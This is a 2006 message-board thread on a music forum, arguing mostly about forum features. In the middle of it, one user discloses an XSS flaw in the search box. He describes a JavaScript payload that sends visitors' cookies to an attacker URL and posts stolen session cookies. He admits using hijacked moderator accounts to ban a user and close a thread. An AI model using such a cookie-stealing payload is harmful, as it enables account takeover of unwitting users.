|
|
JAroen
from the pineal gland on 2006-12-04 14:44 [#02012630]
Points: 16065 Status: Regular
|
|
it was easier to ddos joyrex' place than it was to crash xlt. so there.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 14:51 [#02012633]
Points: 26326 Status: Lurker | Followup to JAroen: #02012630 | Show recordbag
|
|
I used to do it by visiting the forum.
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-04 15:01 [#02012645]
Points: 10507 Status: Webmaster | Followup to giginger: #02012633 | Show recordbag
|
|
nice banner, giginger! :)
|
|
DiaZoHeXagoN
from The city of angels (United States) on 2006-12-04 15:34 [#02012659]
Points: 2659 Status: Lurker | Followup to roygbivcore: #02012621
|
|
I was wondering where he went, I always liked him and his music. anyone care to explain what happened, or is this not a good thing to discuss? Sorry no disrepect, im just curious where panda went...
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 16:42 [#02012684]
Points: 26326 Status: Lurker | Followup to Phobiazero: #02012645 | Show recordbag
|
|
I feel it oozes Web2.0
|
|
Drunken Mastah
from OPPERKLASSESVIN!!! (Norway) on 2006-12-04 16:43 [#02012688]
Points: 35867 Status: Lurker | Followup to giginger: #02012684 | Show recordbag
|
|
is it that css effect thingie? I remember some site you linked once...
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-04 16:50 [#02012697]
Points: 10507 Status: Webmaster | Show recordbag
|
|
hehe..... well, at least we're gonna try to avoid all the fun
and hyped up 2.0-ish colorschemes (green, pink, blue etc)
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-04 16:54 [#02012701]
Points: 4396 Status: Regular
|
|
watmm makes my eyes hurt
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 17:03 [#02012725]
Points: 26326 Status: Lurker | Followup to Drunken Mastah: #02012688 | Show recordbag
|
|
That site is gone or else I'd have used that. Would've looked nicer too.
|
|
Chin Bwoy Phat
from London (United Kingdom) on 2006-12-05 05:05 [#02012889]
Points: 574 Status: Lurker
|
|
watmm is lovely. xlt is lovely. can't we just all get along?
p.s. fuck off
|
|
obara
from Utrecht on 2006-12-05 05:09 [#02012891]
Points: 19377 Status: Regular
|
|
stop this thread please
|
|
Rostasky
from United States on 2006-12-05 06:03 [#02012897]
Points: 1572 Status: Lurker
|
|
They don't have very creative avatars is all I'm gonna say.
|
|
Chin Bwoy Phat
from London (United Kingdom) on 2006-12-05 06:05 [#02012898]
Points: 574 Status: Lurker
|
|
you referring to mine? yes, it's rubbish. i thank you....
|
|
xceque
on 2006-12-05 06:18 [#02012900]
Points: 5888 Status: Moderator | Show recordbag
|
|
The xlt vs watmm debate:
|
| Attached picture |
|
|
|
hma
from real life on 2006-12-05 06:20 [#02012901]
Points: 528 Status: Lurker
|
|
keep in mind, you do have at least one major security hole, the XSS on your search function. In fact, as I post this, I am not actually HMA but someone else using a proxy server. Check my ip address, Im sure it can be done. I also have valid sessionID as horsefactory. I used to have a valid login for you, Phobiazero, but either recently you logged out and logged back in, invalidating your cookies, or you figured out I was logged in as you every day for the past 2 weeks or so. In any case, what I did was as following.
in the search box if put a "> you can add html after that, so I injected javascript to point to some freewebspace as so:
"http://nonexistantwebsitethatdoesntexist.com/folder/evilph p.php?cookies=" . document.cookie;, and then posting the link that said "hey, theres something wrong with your search function.". The first time I did this with my actual ulcresh login, and 2 people followed the link, HMA and Horsefactory, and a couple guests.
There was this whole little thing with Dog_Belch, who by being a dick was actually more intelligent than some others. I used the HMA account to repost a similar hacked link a couple weeks later. 1 non-guest clicked it. Phobiazero. It was very fun to see all the moderator buttons. They seem very underpowered to be honest and I agree with the assessment that you need to improve them.
However, requiring typing the password to change the profile is very secure, good job on that.
Here are the full log files (edited to keep the important info and remove guests):
(this is hma)
Opera/8.54 (Windows NT 5.1; U; en) --- (this is my ULCRESH login, yes, thats right, I just gave ANYONE the ability to log in as ULCRESH)
AFX_NU_SESSION=
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
--- (horsefactory)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1) Gecko/20061010 Firefox/2.0
stupid post character limit. FIX THAT.
|
|
DirtyPriest
from Copenhagen (Denmark) on 2006-12-05 06:23 [#02012902]
Points: 5499 Status: Lurker | Followup to hma: #02012901
|
|
You should probably mail that, instead of posting it
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:24 [#02012903]
Points: 14867 Status: Regular
|
|
anyway, to continue my post as horsefactory: ------------------- (this is phobiazero) his cookies that are no longer valid: __utma=96777942.1310899365.1164665989.1164835731.1164871283 .13; APHEXTWIN_MBOARD_ORDERCHOICE=DESC; __utmz=96777942.1164665989.1.1.utmccn=(direct)|utmcsr=(dire AFX_NU_SESSION=b61bc043e54f32bd954f3df2a6e8e687.1; ct)|utmcmd=(none); __utmb=96777942; __utmc=96777942
219.65.132.1 Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1) Gecko/20061010 Firefox/2.0
You really should fix that. I was gonna log in as Phobiazero and make an "I love WATMM and XLTV2 is vaporware" post, but I was no longer able to.
this is unfortunate.
if youre going to write web applications, KNOW something about security, especially since this runs on PHP v3.
Read up on XSS, SQL Injection, RFI, etc.
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:26 [#02012905]
Points: 14867 Status: Regular
|
|
ps, why can't moderators see people's IP addresses and user agents, stuff like that is useful.
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:31 [#02012906]
Points: 14867 Status: Regular
|
|
also, I did 4 things with these logins: 1) delete my HMA post which Phobiazero had clicked on. 2) I accidentally posted as horsefactory a while back, because I thought I was ULCRESH, he posted right after that saying "I did not post that"
3) I banned some random person that hasn't logged in for several months, just to try it out.
4) I closed some thread, just to try it out.
I think that was it. I could've theoretically banned all of your moderators.
|
|
xceque
on 2006-12-05 06:34 [#02012909]
Points: 5888 Status: Moderator | Followup to horsefactory: #02012906 | Show recordbag
|
|
Lovely. Thanks for not doing that.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:34 [#02012910]
Points: 26326 Status: Lurker | Show recordbag
|
|
Well, that's certainly amusing.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:40 [#02012912]
Points: 26326 Status: Lurker | Show recordbag
|
|
In other news. Zilty has taken to looking like this at work. Despite hard refreshing and clearing of cache.
Pic
|
|
xceque
on 2006-12-05 06:44 [#02012913]
Points: 5888 Status: Moderator | Followup to giginger: #02012912 | Show recordbag
|
|
"Newest message first!"
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:45 [#02012914]
Points: 26326 Status: Lurker | Followup to xceque: #02012913 | Show recordbag
|
|
Hell yes. For some reason that works for me on Zilty.
|
|
xceque
on 2006-12-05 06:48 [#02012916]
Points: 5888 Status: Moderator | Followup to giginger: #02012914 | Show recordbag
|
|
That's like, such a totally rad and awesome concept, dude. I can't get my head around the paradigm shift. Dude!
|
|
redrum
from the allman brothers band (Ireland) on 2006-12-05 06:51 [#02012918]
Points: 12878 Status: Addict | Followup to horsefactory: #02012903
|
|
haha :)
good stuff and well written.
|
|
furoi
from Udine (Eriko Sato's undies) (Italy) on 2006-12-05 06:54 [#02012921]
Points: 1706 Status: Lurker
|
|
it's because of my profile infos
Namastè
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 07:01 [#02012923]
Points: 26326 Status: Lurker | Followup to xceque: #02012916 | Show recordbag
|
|
Gnarly!
|
|
chaosmachine
from Ottawa (Canada) on 2006-12-05 07:59 [#02012945]
Points: 2330 Status: Lurker
|
|
nice xss..
so why aren't sessions validated against ip addresses?.. if the ip has changed since the session was created, you should be required to log back in..
|
|
elusive
from detroit (United States) on 2006-12-05 09:06 [#02012977]
Points: 18368 Status: Lurker | Show recordbag
|
|
good stuff here :)
and phob, keep this board minimal. i don't want stupid-emoticons, edit buttons, quote buttons, sup buttons, howdy buttons, howru buttons,
or anything else . most sites are so damn bloated these days :(
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-05 09:57 [#02012987]
Points: 10507 Status: Webmaster | Show recordbag
|
|
ah yeah, the beta-search... we've added some protection for that now.
as for ip <-> sessions....... xltv2. i'm sure ppl are prepared to sacrify some laziness in order to get some tighter security.
as for ULCRESH: feel free to contact me per email/icq/aim for some further discussions/cooperation. i appreciate your efforts in finding out the bug. we're not using php3 tho... :)
|
|
oyvinto
on 2006-12-05 10:38 [#02013007]
Points: 8197 Status: Lurker | Followup to Phobiazero: #02012481 | Show recordbag
|
|
good to hear that you won't go commercial with the forum phobs. the custom mb as xlt is, is one of the few reasons i like it here.
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:38 [#02013042]
Points: 1389 Status: Lurker | Followup to hma: #02012901
|
|
PWN
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 11:42 [#02013043]
Points: 26326 Status: Lurker | Followup to Joyrex: #02013042 | Show recordbag
|
|
Of course there's never been any hacks for the Invision Power Board.
|
|
chaosmachine
from Ottawa (Canada) on 2006-12-05 11:44 [#02013044]
Points: 2330 Status: Lurker
|
|
lol..
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:48 [#02013049]
Points: 1389 Status: Lurker | Followup to Phobiazero: #02012481
|
|
Let's see if I can follow up to your broken English reply (if there was a proper quote feature I could use that, but oh well... also, I had to do this in two posts since you have a post limit "feature" in place...)
sorry to disappoint you, joyrex...
[You haven't - I was just making an observation/suggestion you took way too seriously]
i believe in our concept/forum just as hard as you believe in mainstream and commercial forums...
[That's great - no problem there]
to be honest, i feel sick everytime i see a forum from "one-of-the-three-messageboard-companies". it's prolly the scandinavian, minimalistic side of me.
[I agree with you on that - most out of the box forums tend to go overboard on features, but most of them allow you to turn things off as they are not needed. So, if I wished, I could make our forum follow a direct, minimalist edict. I actually tried using the forums that came built into the CMS I use for WATMM, but most users missed those features they had gotten used to with the prior forum, so we went back. I see this here occasionally when people ask for common forum features that this one doesn't have. You then have to make the choice of making the majority happy, or stick to your guns and ignore user needs. Hard choice, IMO.
but to nail the issue.... we can add a myriads of features and functions, but we choose to implement only stuff that makes sense.
[As you should... no argument there]
do you really think the lack of an edit-button is a technical
issue due to our "custom" system?
[No, of course not - I just find it odd that a basic feature like editing is still not implemented. I wonder how many posts are followups to what could have been corrected with an edit feature.]
no. i've dismissed the idea of having an edit-feature just as long you've known html - due to various reasons (use the search-feature to find my previous rantings on this).
[Understood - just I think something as basic as editing would be worth considering, even if limite
|
|
Drunken Mastah
from OPPERKLASSESVIN!!! (Norway) on 2006-12-05 11:50 [#02013051]
Points: 35867 Status: Lurker | Followup to Joyrex: #02013049 | Show recordbag
|
|
jeg skal pakke deg inn i bobleplast og pule morra di skal jeg
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 11:50 [#02013052]
Points: 14867 Status: Regular
|
|
haha, wow
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:55 [#02013053]
Points: 1389 Status: Lurker
|
|
d in time (like on our forums).]
as for better tools for the admins, yeah... xltv2 will take care of that. we removed some of the admin-tools due to the infamous Virginpusher-scandal a couple of months ago. imagine a mod on drugs, feeling hatress against his webmaster, and at the same time having the power of deleting
entire threads with a single click! well, we just thought we
would disable these features for a while. it's not like we don't trust our current team of mods, but xltv2 is having a more enhanced set of admin-tools.
[See, there you go - if one of my mods were to go apeshit, I could just disable his or her account, rather than cripple my othe r mods. That's really more a matter of choosing people you can trust, though.]
was that one of the issues with our custom software, joyrex?
i've personally seen ALOT more complains towards your forum than against xltronic/mb (maybe because i hardly visit watmm).
[You're right - in fact, I can't recall the last time I got a complaint about the forum itself]
(slow, ugly, clumsy, unstable and what's more...) but at least you can EDIT messages - HELL YEAH! :)
[That's a bit immature (but expected) - the forum is not slow, ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of users than XLT will ever have, FYI]. Unstable is totally off-base considering many large companies put lots of money behind using these forums - they simply wouldn't if that was the case, and we can do a LOT more than just edit.]
actually, i don't understand why you're still spreading your
annoying, commercial pep-talk here after all these years...
[Just a friendly suggestion/observation - and it's not like I do this all the time]
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:57 [#02013054]
Points: 1389 Status: Lurker
|
|
why don't you try to get some distance to your own "mess" over there? you don't have to answer that btw - i know it's like a nail in the eye. believe me.
[Not really - and since I can't understand your meaning there (I don't fault you for English not being your native language), I really can't say much other than I tend to be more helpful to others than myself - a bit of a failing on my part, really...]
well, time will tell...
[It always does, Mattias, it always does :) ]
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:59 [#02013057]
Points: 1389 Status: Lurker | Followup to Drunken Mastah: #02013051
|
|
That would be nice if I knew what it said, but I don't pretend to know Swedish.
|
|
Sclah
from Freudian Slipmat on 2006-12-05 12:06 [#02013059]
Points: 3121 Status: Lurker
|
|
He wants to purchase bubblewrap and congratulate your mother
|
|
xceque
on 2006-12-05 12:23 [#02013067]
Points: 5888 Status: Moderator | Show recordbag
|
|
Once more...
|
| Attached picture |
|
|
|
ToXikFB
on 2006-12-05 12:23 [#02013068]
Points: 4414 Status: Lurker | Followup to Joyrex: #02013053
|
|
LAZY_TITLE
|
|
vlari
from beyond the valley of the LOLs on 2006-12-05 12:28 [#02013072]
Points: 13915 Status: Regular
|
|
please dont hack my account i post enough rubbish as it is
|
|
dave_g
from United Kingdom on 2006-12-05 13:10 [#02013084]
Points: 3372 Status: Lurker
|
|
Edit features are rubbish. The fact that people have to post a follow up maintains a chronological relationship in the thread, which is easy to follow.
I dislike the design of message boards which have multiple seperate sub forums, it's too divergent.
For example, I want to scan down for a topic from yesterday. I can't search for it because I cannot remember what it was (this is hypothetical), however I will recognise it when I see it.
On a single forum, I scroll down from the latest post until the posts from yesterday, and I will see it.
On a multi sub forum one, I potentially have to do that on all the forums.
Also unless you look at each forum, you could miss a good topic, wheras on here, it is pretty obvious because it's all on one page.
The whole look of watmm is cluttered imo. Too many buttons, too many signatures, images on the end of EVERY post by a user and general crap. I use the mouse wheel and my eye to judge the scroll per content amount, and I think xlt wins.
- - -
Although there may be bugs, one has to commend Phobia and Tune on the fine job done on this site. Perhaps it is idiosynchratic, but it's how they want it. If it's so bad, surely people won't come and it will die out? (natural selection et al).
Joyrex: I think it's quite counter productive and a bit petty to come on here and troll around.
"(stand with arms outstretched, awaiting XLT firing squad)"
surely that is not how you end a productive post? I know there is history, but perhaps keep quiet or say to Phob you're sorry people are abusing the board, and perhaps show some empathy, I'm sure people have abused watmm and I bet you didn't like it.
Anyway, life is too short, less hate, more love.....
|
|
w M w
from London (United Kingdom) on 2006-12-05 13:21 [#02013089]
Points: 21452 Status: Lurker
|
|
I would have paid $200 for that information if nobody else knew still. I would have sold it to sneakattack for $400, and xltronic as we know it would be no more, muah ha ha ha.
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-05 13:30 [#02013091]
Points: 4396 Status: Regular
|
|
ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of
users than XLT will ever have, FYI
|
| Attached picture |
|
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-05 13:31 [#02013092]
Points: 4396 Status: Regular
|
|
if there was a proper quote feature I could use that, but oh well...
|
|
elusive
from detroit (United States) on 2006-12-05 13:54 [#02013102]
Points: 18368 Status: Lurker | Show recordbag
|
|
there is an edit button it's called PREVIEW
|
|
Messageboard index
|